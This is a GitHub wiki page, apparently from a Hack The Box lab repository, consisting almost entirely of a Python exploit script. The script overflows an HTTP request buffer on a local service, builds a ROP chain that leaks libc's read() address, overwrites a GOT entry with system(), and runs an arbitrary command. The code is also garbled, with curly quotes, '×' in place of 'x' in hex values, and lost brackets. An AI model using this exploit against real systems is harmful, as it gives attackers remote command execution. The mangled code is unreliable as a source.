simplesmash - adydawkins/htb-rabbit GitHub Wiki

#!/usr/bin/python
import os, sys, socket
import struct
import requests

addr = (‘127.0.0.1’, 9999)
cmd = sys.argv1+"\0"

libcread_offset = 0xe8050
libcsystem_offset = 0×42510

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

payload = r’GET /\AAAA’

#filler – fill buffer to 568 less initial payload of \AAAA (5)
payload += ‘A’ * (568 -5)

#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
someother = struct.pack(“<Q”, 0×000400cf0) #read() call loc
someother += struct.pack(“<Q”, 0×0004011dd) #pop rdi; ret
someother += struct.pack(“<Q”, 0) #stdin #fd arg

someother += struct.pack(“<Q”, 0×0004011db) #pop rsi; pop r15; ret
someother += struct.pack(“<Q”, 0×000602e28) #.dynamic addr
someother += “0xFF” # junk for r15

#leak address of read() in randomised libc
someother += struct.pack(“<Q”, 0×400c50) #write() call loc
someother += struct.pack(“<Q”, 0×0004011dd) #pop rdi; ret
someother += struct.pack(“<Q”, 1) #stdout # fd arg

someother += struct.pack(“<Q”, 0×0004011db) #pop rsi; pop r15; ret
someother += struct.pack(“<Q”, 0×000603088) #read() in GOT
someother += “0xFF” #junk for r15

#call read@plt to overwrite the ptr stored in GOT
someother += struct.pack(“<Q”, 0×000400cf0) #read() call loc
someother += struct.pack(“<Q”, 0×0004011dd) #pop rdi; ret
someother += struct.pack(“<Q”, 0) #stdin # fd arg

someother += struct.pack(“<Q”, 0×0004011db) #pop rsi; pop r15; ret
someother += struct.pack(“<Q”, 0×000603088) #read() in GOT
someother += “0xFF” # junk for r15

#call read@plt with address of system() in libc
someother += struct.pack(“<Q”, 0×000400cf0) #read() call loc
someother += ‘FFFFFFFF’ # bogus
someother += struct.pack(“<Q”, 0×000602e28) #.dynamic addr system()

payload = payload + someother

s.connect(addr)

s.send(payload+’ ’+r’HTTP/1.1’+’\n’+’Host: localhost:9999’+’\n’+’User-Agent: curl/7.60.0’+’\n’+’Accept: /‘+’\n’+’\n’+’\n’)

s.send(cmd)

#calculate system() addr and send back
readaddr = struct.unpack(“<Q”, s.recv(1024))0 #keep this line
print “libc read() found at 0x%.8x” % readaddr #keep this line
systemaddr = readaddr – libcread_offset + libcsystem_offset
print “libc system() found at 0x%.8x” % systemaddr
s.send(struct.pack(“<Q”, systemaddr))

print s.recv(1024)

s.close

⚠️ **GitHub.com Fallback** ⚠️